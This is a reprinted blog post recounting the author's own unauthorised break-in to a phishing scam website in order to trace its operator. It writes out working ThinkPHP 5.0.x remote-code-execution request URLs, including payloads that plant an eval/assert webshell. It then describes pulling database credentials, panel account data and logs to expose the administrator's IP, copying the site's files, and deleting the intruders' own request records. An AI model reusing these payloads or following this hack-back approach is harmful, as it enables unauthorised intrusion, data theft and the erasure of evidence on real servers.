Title: Record a penetration test of phishing scam websites

A senior was unfortunately cheated of some funds on a phishing website a few days ago. Before contacting the relevant departments, he found me to see if he could obtain some useful information to facilitate the actions of the relevant departments.

After collecting preliminary information on the website, I found that the website uses the ThinkPHP 5.0.7 framework, and directly find the corresponding version of Exp of ThinkPHP and try:

http://www.hu*****.***/index.php?s=/index/\think\app/invokefunctionfunction=phpinfovars[0]=1 //Execute phpinfo

phpinfo was successfully popped up, and the RCE vulnerability of ThinkPHP was not fixed. It can be seen through phpinfo that the server is built using a pagoda and runs the Windows system. I thought that the next thing was very simple, but I encountered difficulties when I wrote the shell:

http://www.hu****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=file_put_contentsvars[1][]=ye.phpvars[1][]=?php

eval($_POST['cmd']);

The file was successfully written, but it was directly output to the page. Check the source code and found that it was escaped as HTML entity encoding

After trying to use base64 encoding and then write it, I found that it was still escaped, so I directly executed the command and tried it:

http://www.hu****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=dir

I found that there was no echo, and I tried to rebound the shell but failed. At this time, I felt that the system might have been disabled, and I switched to eval and still failed. Finally, I found that it could be successfully executed using assert, so I directly constructed the shell connection:

http://www.hu*****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=assertvars[1][]=@eval($_POST[ye])

After getting the shell, I tried to execute the command first, but the command still couldn't execute normally. I tried to break through the disabled_function but failed

At this time, change your mind and check the server configuration file/application/database.php of the ThinkPHP framework to get the MySQL database account

Connect to the database

Query backend administrator data

But I found that md5 could not be unlocked, but I roughly checked the data in the database. I didn't find any data that was of great help here, so I didn't consider continuing to stick to the backend account.

The main focus next should be on collecting information for the site administrator. First check the logging file /runtime/log/202107/05.log in the ThinkPHP framework

I found that the system function was indeed disabled in the log

At the same time, an important data that was ignored when checking the database was found in the log. —— The last login IP of the backend administrator

Looking through the records a few days ago, I found that the last login IP was 101.78.*.*. I suspected that this was the IP address of the website administrator. After feedbacking it to the senior, I checked the IP and found that it was an IP from Hong Kong. I felt panic: This should be a V P N hanging

The result is as expected

The following work was deadlocked. After flipping through ThinkPHP's log, no login data of other IPs were found. The backend administrator account password was modified in the database. After logging in to the background, no useful information was found. There was only the management of some phishing articles

Later, I communicated with a master. The master suggested checking if there is any useful information left in the pagoda. I found the data file of the pagoda panel in C:/BtSoft/panel/data/default.db and obtained the pagoda account information

At the same time, I also checked the log contents in the pagoda database

However, the password cannot be untie. At this time, you can reset the account password by overwriting the db file. However, this method requires restarting the panel. Due to our current situation, this method is difficult to implement.

So my thoughts fell into a deadlock again. After sleeping, I woke up the next day and remembered that there would be a request log for the pagoda panel. So I found a large number of request information stored in json in C:/BtSoft/panel/logs/request/

Opening the log file that was earlier, there was indeed a breakthrough (it may be that V P N is unstable and suddenly hangs up during operation, resulting in leakage of the real IP)

After querying 175.167.*.*, it was found that it was the IP address of Shenyang, Liaoning, and used online tools to roughly locate and feedback to the seniors.

By the way, the website’s source code, database, and log files are packaged and collected, and finally deleted the request record we left during the infiltration

Finished work

Reprinted from the original link: https://www.cnblogs.com/yesec/p/14983903.html